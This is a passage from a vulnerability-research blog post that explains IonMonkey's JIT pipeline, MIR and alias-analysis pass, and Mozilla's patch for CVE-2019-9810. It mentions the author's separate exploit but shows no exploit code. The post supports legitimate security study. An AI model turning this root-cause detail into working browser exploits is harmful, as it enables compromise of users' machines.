to manipulate 64-bit integers. Around the same time ZDI had released a PoC for CVE-2019-9810 which is an issue in IonMonkey (Mozilla's speculative JIT engine) that was discovered and used by the magicians Richard Zhu and Amat Cama during Pwn2Own2019 for compromising Mozilla's web-browser. This was the perfect occasion to write an exploit and add BigInt support in my utility script. You can find the actual exploit on my github in the following repository: CVE-2019-9810. Once I was done with it, I felt that it was also a great occasion to dive into Ion and get to know each other. The original exploit was written without understanding one bit of the root-cause of the issue and unwinding this sounded like a nice exercise. This is basically what this blogpost is about, me exploring Ion's code-base and investigating the root-cause of CVE-2019-9810. The title of the issue "IonMonkey MArraySlice has incorrect alias information" sounds to suggest that the root of the issue concerns some alias information and the fix of the issue also points at Ion's AliasAnalysis optimization pass. Before starting, if you guys want to follow the source-code at home without downloading the whole of Spidermonkey’s / Firefox’s source-code I have set-up the woboq code browser on an S3 bucket here: ff-woboq - just remember that the snapshot has the fix for the issue we are discussing. Last but not least, I've noticed that IonMonkey gets decent code-churn and as a result some of the functions I mention below can be appear with a slightly different name on the latest available version. All right, buckle up and enjoy the read! Speculative optimizing JIT compiler This part is not really meant to introduce what optimizing speculative JIT engines are in detail but instead giving you an idea of the problem they are trying to solve. On top of that, we want to introduce some background knowledge about Ion specifically that is required to be able to follow what is to come. For the people that never heard about JIT (just-in-time) engines, this is a piece of software that is able to turn code that is managed code into native code as it runs. This has been historically used by interpreted languages to produce faster code as running assembly is faster than a software CPU running code. With that in mind, this is what the Javascript bytecode looks like in Spidermonkey: js> function f(a, b) { return a+b; } js> dis(f) flags: CONSTRUCTOR loc op ----- -- main: 00000: getarg 0 # 00003: getarg 1 # 00006: add # 00007: return # 00008: retrval # !!! UNREACHABLE !!! Source notes: ofs line pc delta desc args ---- ---- ----- ------ -------- ------ 0: 1 0 [ 0] colspan 19 2: 1 0 [ 0] step-sep 3: 1 0 [ 0] breakpoint 4: 1 7 [ 7] colspan 12 6: 1 8 [ 1] breakpoint  Now, generating assembly is one thing but the JIT engine can be more advanced and apply a bunch of program analysis to optimize the code even more. Imagine a loop that sums every item in an array and does nothing else. Well, the JIT engine might be able to prove that it is safe to not do any bounds check on the index in which case it can remove it. Another easy example to reason about is an object getting constructed in a loop body but doesn't depend on the loop itself at all. If the JIT engine can prove that the statement is actually an invariant, then why constructing it for every run of the loop body? In that case it makes sense for the optimizer to move the statement out of the loop to avoid the useless constructions. This is the optimized assembly generated by Ion for the same function than above: 0:000> u . l20 000003add5d09231 cc int 3 000003add5d09232 8b442428 mov eax,dword ptr [rsp+28h] 000003add5d09236 8b4c2430 mov ecx,dword ptr [rsp+30h] 000003add5d0923a 03c1 add eax,ecx 000003add5d0923c 0f802f000000 jo 000003add5d09271 000003add5d09242 48b9000000000080f8ff mov rcx,0FFF8800000000000h 000003add5d0924c 480bc8 or rcx,rax 000003add5d0924f c3 ret 000003add5d09271 2bc1 sub eax,ecx 000003add5d09273 e900000000 jmp 000003add5d09278 000003add5d09278 6a0d push 0Dh 000003add5d0927a e900000000 jmp 000003add5d0927f 000003add5d0927f 6a00 push 0 000003add5d09281 e99a6effff jmp 000003add5d00120 <- bailout  OK so this was for optimizing and JIT compiler, but what about speculative now? If you think about this for a minute or two though, in order to pull off the optimizations we talked about above, you also need a lot of information about the code you are analyzing. For example, you need to know the types of the object you are dealing with, and this information is hard to get in dynamically typed languages because by-design the type of a variable changes across the program execution. Now, obviously the engine cannot randomly speculates about types, instead what they usually do is introspect the program at runtime and observe what is going on. If this function has been invoked many times and everytime it only received integers, then the engine makes an educated guess and speculates that the function receives integers. As a result, the engine is going to optimize that function under this assumption. On top of optimizing the function it is going to insert a bunch of code that is only meant to ensure that the parameters are integers and not something else (in which case the generated code is not valid). Adding two integers is not the same as adding two strings together for example. So if the engine encounters a case where the speculation it made doesn't hold anymore, it can toss the code it generated and fall-back to executing (called a deoptimization bailout) the code back in the interpreter, resulting in a performance hit. As you can imagine, the process of analyzing the program as well as running a full optimization pipeline and generating native code is very costly. So at times, even though the interpreter is slower, the cost of JITing might not be worth it over just executing something in the interpreter. On the other hand, if you executed a function let's say a thousand times, the cost of JITing is probably gonna be offset over time by the performance gain of the optimized native code. To deal with this, Ion uses what it calls warm-up counters to identify hot code from cold code (which you can tweak with --ion-warmup-threshold passed to the shell).  // Force how many invocation or loop iterations are needed before compiling // a function with the highest ionmonkey optimization level. // (i.e. OptimizationLevel_Normal) const char* forcedDefaultIonWarmUpThresholdEnv = "JIT_OPTION_forcedDefaultIonWarmUpThreshold"; if (const char* env = getenv(forcedDefaultIonWarmUpThresholdEnv)) { Maybe<int> value = ParseInt(env); if (value.isSome()) { forcedDefaultIonWarmUpThreshold.emplace(value.ref()); } else { Warn(forcedDefaultIonWarmUpThresholdEnv, env); } } // From the Javascript shell source-code int32_t warmUpThreshold = op.getIntOption("ion-warmup-threshold"); if (warmUpThreshold >= 0) { jit::JitOptions.setCompilerWarmUpThreshold(warmUpThreshold); }  On top of all of the above, Spidermonkey uses another type of JIT engine that produces less optimized code but produces it at a lower cost. As a result, the engine has multiple options depending on the use case: it can run in interpreted mode, it can perform cheaper-but-slower JITing, or it can perform expensive-but-fast JITing. Note that this article only focuses Ion which is the fastest/most expensive tier of JIT in Spidermonkey. Here is an overview of the whole pipeline (picture taken from Mozilla’s wiki): OK so in Spidermonkey the way it works is that the Javascript code is translated to an intermediate language that the interpreter executes. This bytecode enters Ion and Ion converts it to another representation which is the Middle-level Intermediate Representation (abbreviated MIR later) code. This is a pretty simple IR which uses Static Single Assignment and has about ~300 instructions. The MIR instructions are organized in basic-blocks and themselves form a control-flow graph. Ion's optimization pipeline is composed of 29 steps: certain steps actually modifies the MIR graph by removing or shuffling nodes and others don't modify it at all (they just analyze it and produce results consumed by later passes). To debug Ion, I recommend to add the below to your mozconfig file: ac_add_options --enable-jitspew  This basically turns on a bunch of macro in the Spidermonkey code-base that are used to spew debugging information on the standard output. The debugging infrastructure is not nearly as nice as Turbolizer but we will do with the tools we have. The JIT subsystem can define a number of channels where it can output spew and the user can turn on/off any of them. This is pretty useful if you want to debug a single optimization pass for example. // New channels may be added below. #define JITSPEW_CHANNEL_LIST(_) \ /* Information during sinking */ \ _(Prune) \ /* Information during escape analysis */ \ _(Escape) \ /* Information during alias analysis */ \ _(Alias) \ /* Information during alias analysis */ \ _(AliasSummaries) \ /* Information during GVN */ \ _(GVN) \ /* Information during sincos */ \ _(Sincos) \ /* Information during sinking */ \ _(Sink) \ /* Information during Range analysis */ \ _(Range) \ /* Information during LICM */ \ _(LICM) \ /* Info about fold linear constants */ \ _(FLAC) \ /* Effective address analysis info */ \ _(EAA) \ /* Information during regalloc */ \ _(RegAlloc) \ /* Information during inlining */ \ _(Inlining) \ /* Information during codegen */ \ _(Codegen) \ /* Debug info about safepoints */ \ _(Safepoints) \ /* Debug info about Pools*/ \ _(Pools) \ /* Profiling-related information */ \ _(Profiling) \ /* Information of tracked opt strats */ \ _(OptimizationTracking) \ _(OptimizationTrackingExtended) \ /* Debug info about the I */            \
_(CacheFlush)                            \
/* Output a list of MIR expressions */   \
_(MIRExpressions)                        \
/* Print control flow graph */           \
_(CFG)                                   \
\
/* BASELINE COMPILER SPEW */             \
\
/* Aborting Script Compilation. */       \
_(BaselineAbort)                         \
/* Script Compilation. */                \
_(BaselineScripts)                       \
/* Detailed op-specific spew. */         \
_(BaselineOp)                            \
/* Inline caches. */                     \
_(BaselineIC)                            \
/* Inline cache fallbacks. */            \
_(BaselineICFallback)                    \
/* OSR from Baseline => Ion. */          \
_(BaselineOSR)                           \
/* Bailouts. */                          \
_(BaselineBailouts)                      \
/* Debug Mode On Stack Recompile . */    \
_(BaselineDebugModeOSR)                  \
\
/* ION COMPILER SPEW */                  \
\
/* Used to abort SSA construction */     \
_(IonAbort)                              \
/* Information about compiled scripts */ \
_(IonScripts)                            \
/* Info about failing to log script */   \
_(IonSyncLogs)                           \
/* Information during MIR building */    \
_(IonMIR)                                \
/* Information during bailouts */        \
_(IonBailouts)                           \
/* Information during OSI */             \
_(IonInvalidate)                         \
/* Debug info about snapshots */         \
_(IonSnapshots)                          \
/* Generated inline cache stubs */       \
_(IonIC)
enum JitSpewChannel {
#define JITSPEW_CHANNEL(name) JitSpew_##name,
JITSPEW_CHANNEL_LIST(JITSPEW_CHANNEL)
#undef JITSPEW_CHANNEL
JitSpew_Terminator
};


In order to turn those channels you need to define an environment variable called IONFLAGS where you can specify a comma separated string with all the channels you want turned on: IONFLAGS=alias,alias-sum,gvn,bailouts,logs for example. Note that the actual channel names don’t quite match with the macros above and so you can find all the names below:

static void PrintHelpAndExit(int status = 0) {
fflush(nullptr);
printf(
"\n"
"usage: IONFLAGS=option,option,option,... where options can be:\n"
"\n"
"  aborts        Compilation abort messages\n"
"  scripts       Compiled scripts\n"
"  mir           MIR information\n"
"  prune         Prune unused branches\n"
"  escape        Escape analysis\n"
"  alias         Alias analysis\n"
"  alias-sum     Alias analysis: shows summaries for every block\n"
"  gvn           Global Value Numbering\n"
"  licm          Loop invariant code motion\n"
"  flac          Fold linear arithmetic constants\n"
"  sincos        Replace sin/cos by sincos\n"
"  sink          Sink transformation\n"
"  regalloc      Register allocation\n"
"  inline        Inlining\n"
"  snapshots     Snapshot information\n"
"  codegen       Native code generation\n"
"  bailouts      Bailouts\n"
"  caches        Inline caches\n"
"  osi           Invalidation\n"
"  safepoints    Safepoints\n"
"  pools         Literal Pools (ARM only for now)\n"
"  cacheflush    Instruction Cache flushes (ARM only for now)\n"
"  range         Range Analysis\n"
"  logs          JSON visualization logging\n"
"  logs-sync     Same as logs, but flushes between each pass (sync. "
"compiled functions only).\n"
"  profiling     Profiling-related information\n"
"  trackopts     Optimization tracking information gathered by the "
"Gecko profiler. "
"(Note: call enableGeckoProfiling() in your script to enable it).\n"
"  trackopts-ext Encoding information about optimization tracking\n"
"  dump-mir-expr Dump the MIR expressions\n"
"  cfg           Control flow graph generation\n"
"  all           Everything\n"
"\n"
"  bl-aborts     Baseline compiler abort messages\n"
"  bl-scripts    Baseline script-compilation\n"
"  bl-op         Baseline compiler detailed op-specific messages\n"
"  bl-ic         Baseline inline-cache messages\n"
"  bl-ic-fb      Baseline IC fallback stub messages\n"
"  bl-osr        Baseline IC OSR messages\n"
"  bl-bails      Baseline bailouts\n"
"  bl-dbg-osr    Baseline debug mode on stack recompile messages\n"
"  bl-all        All baseline spew\n"
"\n"
"\n");
exit(status);
}


An important channel is logs which tells the compiler to output a ion.json file (in /tmp on Linux) which packs a ton of information that it gathered throughout the pipeline and optimization process. This file is meant to be loaded by another tool to provide a visualization of the MIR graph throughout the passes. You can find the original iongraph.py but I personally use ghetto-iongraph.py to directly render the graphviz graph into SVG in the browser whereas iongraph assumes graphviz is installed and outputs a single PNG file per pass. You can also toggle through all the pass directly from the browser which I find more convenient than navigating through a bunch of PNG files:

You can invoke it like this:

python c:\work\codes\ghetto-iongraph.py --js-path c:\work\codes\mozilla-central\obj-ff64-asan-fuzzing\dist\bin\js.exe --script-path %1 --overwrite


Reading MIR code is not too bad, you just have to know a few things:

1. Every instruction is an object
2. Each instruction can have operands that can be the result of a previous instruction
10 | add unbox8:Int32 unbox9:Int32 [int32]

1. Every instruction is identified by an identifier, which is an integer starting from 0
2. There are no variable names; if you want to reference the result of a previous instruction it creates a name by taking the name of the instruction concatenated with its identifier like unbox8 and unbox9 above. Those two references two unbox instructions identified by their identifiers 8 and 9:
08 | unbox parameter1 to Int32 (infallible)
09 | unbox parameter2 to Int32 (infallible)


That is all I wanted to cover in this little IonMonkey introduction - I hope it helps you wander around in the source-code and start investigating stuff on your own.

If you would like more content on the subject of Javascript JIT compilers, here is a list of links worth reading (they talk about different Javascript engine but the concepts are usually the same):

• JavaScript Core powering Safari:

• Chakra powering Microsoft Edge: Architecture overview

Let's have a look at alias analysis now :)

Diving into Alias Analysis

The purpose of this part is to understand more of the alias analysis pass which is the specific optimization pass that has been fixed by Mozilla. To understand it a bit more we will simply take small snippets of Javascript, observe the results in a debugger as well as following the source-code along. We will get back to the vulnerability a bit later when we understand more about what we are talking about :). A good way to follow this section along is to open a web-browser to this file/function: AliasAnalysis.cpp:analyze.

Let's start with simple.js defined as the below:

function x() {
const a = [1,2,3,4];
a.slice();
}

for(let Idx = 0; Idx < 10000; Idx++) {
x();
}


Once x is compiled, we end up with the below MIR code after the AliasAnalysis pass has run (pass#09) (I annotated and cut some irrelevant parts):

...
08 | constant object 2cb22428f100 (Array)
09 | newarray constant8:Object
------------------------------------------------------ a[0] = 1
10 | constant 0x1
11 | constant 0x0
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
15 | constant 0x2
16 | constant 0x1
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
20 | constant 0x3
21 | constant 0x2
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
25 | constant 0x4
26 | constant 0x3
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
32 | constant 0x0
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


The alias analysis is able to output a summary on the alias-sum channel and this is what it prints out when ran against x:

[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements12 marked depending on start4
[AliasSummaries]  elements17 marked depending on setinitializedlength14
[AliasSummaries]  elements22 marked depending on setinitializedlength19
[AliasSummaries]  elements27 marked depending on setinitializedlength24
[AliasSummaries]  elements33 marked depending on setinitializedlength29
[AliasSummaries]  arraylength34 marked depending on setinitializedlength29


OK, so that's kind of a lot for now so let's start at the beginning. Ion uses what they call alias set. You can see an alias set as an equivalence sets (term also used in compiler literature). Everything belonging to the same equivalence set may alias. Ion performs this analysis to determine potential dependencies between load and store instructions; that’s all it cares about. Alias information is used later in the pipeline to carry optimization such as redundancy elimination for example - more on that later.

// [SMDOC] IonMonkey Alias Analysis
//
// This pass annotates every load instruction with the last store instruction
// on which it depends. The algorithm is optimistic in that it ignores explicit
// dependencies and only considers loads and stores.
//
// Loads inside loops only have an implicit dependency on a store before the
// loop header if no instruction inside the loop body aliases it. To calculate
// this efficiently, we maintain a list of maybe-invariant loads and the
// combined alias set for all stores inside the loop. When we see the loop's
// backedge, this information is used to mark every load we wrongly assumed to
// be loop invariant as having an implicit dependency on the last instruction of
// the loop header, so that it's never moved before the loop header.
//
// The algorithm depends on the invariant that both control instructions and
// effectful instructions (stores) are never hoisted.


In Ion, instructions are free to provide refinement to their alias set by overloading getAliasSet; here are the various alias sets defined for every different MIR opcode that we encountered in the MIR code of x:

// A constant js::Value.
class MConstant : public MNullaryInstruction {
AliasSet getAliasSet() const override { return AliasSet::None(); }
};

class MNewArray : public MUnaryInstruction, public NoTypePolicy::Data {
// NewArray is marked as non-effectful because all our allocations are
// either lazy when we are using "new Array(length)" or bounded by the
// script or the stack size when we are using "new Array(...)" or "[...]"
// notations.  So we might have to allocate the array twice if we bail
// during the computation of the first element of the square braket
// notation.
virtual AliasSet getAliasSet() const override { return AliasSet::None(); }
};

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
AliasSet getAliasSet() const override {
}
};

// Store a value to a dense array slots vector.
class MStoreElement
: public MTernaryInstruction,
public MStoreElementCommon,
public MixPolicy<SingleObjectPolicy, NoFloatPolicy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element);
}
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};

class MArrayLength : public MUnaryInstruction, public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
}
};

// Array.prototype.slice on a dense array.
class MArraySlice : public MTernaryInstruction,
public MixPolicy<ObjectPolicy<0>, UnboxedInt32Policy<1>,
UnboxedInt32Policy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
}
};


The analyze function ignores instruction that are associated with no alias set as you can see below..:

    for (MInstructionIterator def(block->begin()),
end(block->begin(block->lastIns()));
def != end; ++def) {
def->setId(newId++);
AliasSet set = def->getAliasSet();
if (set.isNone()) {
continue;
}


..so let's simplify the MIR code by removing all the constant and newarray instructions to focus on what matters:

------------------------------------------------------ a[0] = 1
...
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
...
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
...
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
...
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


In analyze, the stores vectors organize and keep track of every store instruction (any instruction that defines a Store() alias set) depending on their alias set; for example, if we run the analysis on the code above this is what the vectors would look like:

stores[AliasSet::Element]      = [13, 18, 23, 28, 35]
stores[AliasSet::ObjectFields] = [14, 19, 24, 29, 35]


This reads as instructions 13, 18, 23, 28 and 35 are store instruction in the AliasSet::Element alias set. Note that the instruction 35 not only alias AliasSet::Element but also AliasSet::ObjectFields.

Once the algorithm encounters a load instruction (any instruction that defines a Load() alias set), it wants to find the last store this load depends on, if any. To do so, it walks the stores vectors and evaluates the load instruction with the current store candidate (note that there is no need to walk the stores[AliasSet::Element vector if the load instruction does not even alias AliasSet::Element).

To establish a dependency link, obviously the two instructions don't only need to have alias set that intersects (Load(Any) intersects with Store(AliasSet::Element) for example). They also need to be operating on objects of the same type. This is what the function genericMightAlias tries to figure out: GetObject is used to grab the appropriate operands of the instruction (the one that references the object it is loading from / storing to), and objectsIntersect to do what its name suggests. The MayAlias analysis does two things:

1. Check if two instructions have intersecting alias sets
1. AliasSet::Load(AliasSet::Any) intersects with AliasSet::Store(AliasSet::Element)
2. Check if these instructions operate on intersecting TypeSets
1. GetObject is used to grab the appropriate operands off the instruction,
2. Then get its TypeSet,
3. And compute the intersection with objectsIntersect.
// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
return nullptr;
}

// Note: only return the object if that object owns that property.
// I.e. the property isn't on the prototype chain.
const MDefinition* object = nullptr;
switch (ins->op()) {
case MDefinition::Opcode::InitializedLength:
// [...]
case MDefinition::Opcode::Elements:
object = ins->getOperand(0);
break;
}

object = MaybeUnwrap(object);
return object;
}

// Generic comparing if a load aliases a store using TI information.
MDefinition::AliasType AliasAnalysis::genericMightAlias(
const MDefinition* load, const MDefinition* store) {
const MDefinition* storeObject = GetObject(store);
return MDefinition::AliasType::MayAlias;
}

return MDefinition::AliasType::MayAlias;
}

storeObject->resultTypeSet())) {
return MDefinition::AliasType::MayAlias;
}

return MDefinition::AliasType::NoAlias;
}


Now, let's try to walk through this algorithm step-by-step for a little bit. We start in AliasAnalysis::analyze and assume that the algorithm has already run for some time against the above MIR code. It just grabbed the load instruction 17 | elements newarray9:Object (has an Load() alias set). At this point, the stores vectors are expected to look like this:

stores[AliasSet::Element]      = [13]
stores[AliasSet::ObjectFields] = [14]


The next step of the algorithm now is to figure out if the current load is depending on a prior store. If it does, a dependency link is created between the two; if it doesn't it carries on.

To achieve this, it iterates through the stores vectors and evaluates the current load against every available candidate store (aliasedStores in AliasAnalysis::analyze). Of course it doesn't go through every vector, but only the ones that intersects with the alias set of the load instruction (there is no point to carry on if we already know off the bat that they don't even intersect).

In our case, the 17 | elements newarray9:Object can only alias with a store coming from store[AliasSet::ObjectFields] and so 14 | setinitializedlength elements12:Elements constant11:Int32 is selected as the current store candidate.

The next step is to know if the load instruction can alias with the store instruction. This is carried out by the function AliasAnalysis::genericMightAlias which returns either MayAlias or NoAlias.

The first stage is to understand if the load and store nodes even have anything related to each other. Keep in mind that those nodes are instructions with operands and as a result you cannot really tell if they are working on the same objects without looking at their operands. To extract the actual relevant object, it calls into GetObject which is basically a big switch case that picks the right operand depending on the instruction. As an example, for 17 | elements newarray9:Object, GetObject selects the first operand which is newarray9:Object.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
return nullptr;
}

// Note: only return the object if that object owns that property.
// I.e. the property isn't on the prototype chain.
const MDefinition* object = nullptr;
switch (ins->op()) {
// [...]
case MDefinition::Opcode::Elements:
object = ins->getOperand(0);
break;
}

object = MaybeUnwrap(object);
return object;
}


Once it has the operand, it goes through one last step to potentially unwrap the operand until finding the corresponding object.

// Unwrap any slot or element to its corresponding object.
static inline const MDefinition* MaybeUnwrap(const MDefinition* object) {
while (object->isSlots() || object->isElements() ||
object->isConvertElementsToDoubles()) {
MOZ_ASSERT(object->numOperands() == 1);
object = object->getOperand(0);
}
if (object->isTypedArrayElements()) {
return nullptr;
}
if (object->isTypedObjectElements()) {
return nullptr;
}
if (object->isConstantElements()) {
return nullptr;
}
return object;
}


In our case newarray9:Object doesn't need any unwrapping as this is neither an MSlots / MElements / MConvertElementsToDoubles node. For the store candidate though, 14 | setinitializedlength elements12:Elements constant11:Int32, GetObject returns its first argument elements12 which isn't the actual 'root' object. This is when MaybeUnwrap is useful and grabs for us the first operand of 12 | elements newarray9:Object, newarray9 which is the root object. Cool.

Anyways, once we have our two objects, loadObject and storeObject we need to figure out if they are related. To do that, Ion uses a structure called a js::TemporaryTypeSet. My understanding is that a TypeSet completely describe the values that a particular value might have.

/*
* [SMDOC] Type-Inference TypeSet
*
* Information about the set of types associated with an lvalue. There are
* three kinds of type sets:
*
* - StackTypeSet are associated with TypeScripts, for arguments and values
*   observed at property reads. These are implicitly frozen on compilation
*   and only have constraints added to them which can trigger invalidation of
*   TypeNewScript information.
*
* - HeapTypeSet are associated with the properties of ObjectGroups. These
*   may have constraints added to them to trigger invalidation of either
*   compiled code or TypeNewScript information.
*
* - TemporaryTypeSet are created during compilation and do not outlive
*   that compilation.
*
* The contents of a type set completely describe the values that a particular
* lvalue might have, except for the following cases:
*
* - If an object's prototype or class is dynamically mutated, its group will
*   change. Type sets containing the old group will not necessarily contain
*   the new group. When this occurs, the properties of the old and new group
*   will both be marked as unknown, which will prevent Ion from optimizing
*   based on the object's type information.
*
* - If an unboxed object is converted to a native object, its group will also
*   change and type sets containing the old group will not necessarily contain
*   the new group. Unlike the above case, this will not degrade property type
*   information, but Ion will no longer optimize unboxed objects with the old
*   group.
*/


As a reminder, in our case we have newarray9:Object as loadObject (extracted off 17 | elements newarray9:Object) and newarray9:Object (extracted off 14 | setinitializedlength elements12:Elements constant11:Int32 which is the store candidate). Their TypeSet intersects (they have the same one) and as a result this means genericMightAlias returns Alias::MayAlias.

If genericMightAlias returns MayAlias the caller AliasAnalysis::analyze invokes the method mightAlias on the def variable which is the load instruction. This method is a virtual method that can be overridden by instructions in which case they get a chance to specify a specific behavior there.

Otherwise, the basic implementation is provided by js::jit::MDefinition::mightAlias which basically re-checks that the alias sets do intersect (even though we already know that at this point):

  virtual AliasType mightAlias(const MDefinition* store) const {
// Return whether this load may depend on the specified store, given
// that the alias sets intersect. This may be refined to exclude
// possible aliasing in cases where alias set flags are too imprecise.
if (!(getAliasSet().flags() & store->getAliasSet().flags())) {
return AliasType::NoAlias;
}
MOZ_ASSERT(!isEffectful() && store->isEffectful());
return AliasType::MayAlias;
}


As a reminder, in our case, the load instruction has the alias set Load(AliasSet::ObjectFields), and the store instruction has the alias set Store(AliasSet::ObjectFields)) as you can see below.

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
AliasSet getAliasSet() const override {
}
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};


We are nearly done but... the algorithm doesn't quite end just yet though. It keeps iterating through the store candidates as it is only interested in the most recent store (lastStore in AliasAnalysis::analyze) and not a store as you can see below.

// Find the most recent store on which this instruction depends.
MInstruction* lastStore = firstIns;
for (AliasSetIterator iter(set); iter; iter++) {
MInstructionVector& aliasedStores = stores[*iter];
for (int i = aliasedStores.length() - 1; i >= 0; i--) {
MInstruction* store = aliasedStores[i];
if (genericMightAlias(*def, store) !=
MDefinition::AliasType::NoAlias &&
def->mightAlias(store) != MDefinition::AliasType::NoAlias &&
BlockMightReach(store->block(), *block)) {
if (lastStore->id() < store->id()) {
lastStore = store;
}
break;
}
}
}
def->setDependency(lastStore);
IonSpewDependency(*def, lastStore, "depends", "");


In our simple example, this is the only candidate so we do have what we are looking for :). And so a dependency is born..!

Of course we can also ensure that this result is shown in Ion's spew (with both alias and alias-sum channels turned on):

Processing store setinitializedlength14 (flags 1)
Load elements17 depends on store setinitializedlength14 ()
...
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements17 marked depending on setinitializedlength14


Great :).

At this point, we have an OK understanding of what is going on and what type of information the algorithm is looking for. What is also interesting is that the pass actually doesn't transform the MIR graph at all, it just analyzes it. Here is a small recap on how the analysis pass works against our code:

It iterates over the instructions in the basic block and only cares about store and load instructions If the instruction is a store, it gets added to a vector to keep track of it If the instruction is a load, it evaluates it against every store in the vector If the load and the store MayAlias a dependency link is created between them mightAlias checks the intersection of both AliasSet genericMayAlias checks the intersection of both TypeSet If the engine can prove that there is NoAlias possible then this algorithm carries on

Even though the root-cause of the bug might be in there, we still need to have a look at what comes next in the optimization pipeline in order to understand how the results of this analysis are consumed. We can also expect that some of the following passes actually transform the graph which will introduce the exploitable behavior.

Analysis of the patch

Now that we have a basic understanding of the Alias Analysis pass and some background information about how Ion works, it is time to get back to the problem we are trying to solve: what happens in CVE-2019-9810?

First things first: Mozilla fixed the issue by removing the alias set refinement done for the arrayslice instruction which will ensure creation of dependencies between arrayslice and loads instruction (which also means less opportunity for optimization):

# HG changeset patch
# User Jan de Mooij <[email protected]>
# Date 1553190741 0
# Node ID 229759a67f4f26ccde9f7bde5423cfd82b216fa2
# Parent  feda786b35cb748e16ef84b02c35fd12bd151db6
Bug 1537924 - Simplify some alias sets in Ion. r=tcampbell, a=dveditz

Differential Revision: https://phabricator.services.mozilla.com/D24400

diff --git a/js/src/jit/AliasAnalysis.cpp b/js/src/jit/AliasAnalysis.cpp
--- a/js/src/jit/AliasAnalysis.cpp
+++ b/js/src/jit/AliasAnalysis.cpp
@@ -128,17 +128,16 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::MaybeCopyElementsForWrite:
case MDefinition::Opcode::MaybeToDoubleElement:
case MDefinition::Opcode::TypedArrayLength:
case MDefinition::Opcode::TypedArrayByteOffset:
case MDefinition::Opcode::SetTypedObjectOffset:
case MDefinition::Opcode::SetDisjointTypedElements:
case MDefinition::Opcode::ArrayPopShift:
case MDefinition::Opcode::ArrayPush:
-    case MDefinition::Opcode::ArraySlice:
case MDefinition::Opcode::StoreTypedArrayElementHole:
case MDefinition::Opcode::StoreFixedSlot:
case MDefinition::Opcode::GetPropertyPolymorphic:
case MDefinition::Opcode::SetPropertyPolymorphic:
case MDefinition::Opcode::GuardShape:
@@ -153,16 +152,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::TypedArrayElements:
case MDefinition::Opcode::TypedObjectElements:
case MDefinition::Opcode::CopyLexicalEnvironmentObject:
case MDefinition::Opcode::IsPackedArray:
object = ins->getOperand(0);
break;
case MDefinition::Opcode::GetPropertyCache:
+    case MDefinition::Opcode::CallGetProperty:
case MDefinition::Opcode::GetDOMProperty:
case MDefinition::Opcode::GetDOMMember:
case MDefinition::Opcode::Call:
case MDefinition::Opcode::Compare:
case MDefinition::Opcode::GetArgumentsObjectArg:
case MDefinition::Opcode::SetArgumentsObjectArg:
case MDefinition::Opcode::GetFrameArgument:
case MDefinition::Opcode::SetFrameArgument:
@@ -179,16 +179,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::WasmAtomicExchangeHeap:
case MDefinition::Opcode::WasmStoreGlobalVar:
case MDefinition::Opcode::WasmStoreGlobalCell:
case MDefinition::Opcode::WasmStoreRef:
case MDefinition::Opcode::ArrayJoin:
+    case MDefinition::Opcode::ArraySlice:
return nullptr;
default:
#ifdef DEBUG
// Crash when the default aliasSet is overriden, but when not added in the
// list above.
if (!ins->getAliasSet().isStore() ||
ins->getAliasSet().flags() != AliasSet::Flag::Any) {
MOZ_CRASH(
diff --git a/js/src/jit/MIR.h b/js/src/jit/MIR.h
--- a/js/src/jit/MIR.h
+++ b/js/src/jit/MIR.h
@@ -8077,19 +8077,16 @@ class MArraySlice : public MTernaryInstr
TRIVIAL_NEW_WRAPPERS
NAMED_OPERANDS((0, object), (1, begin), (2, end))

JSObject* templateObj() const { return templateObj_; }

gc::InitialHeap initialHeap() const { return initialHeap_; }

-  AliasSet getAliasSet() const override {
-    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
-  }
bool possiblyCalls() const override { return true; }
bool appendRoots(MRootList& roots) const override {
return roots.append(templateObj_);
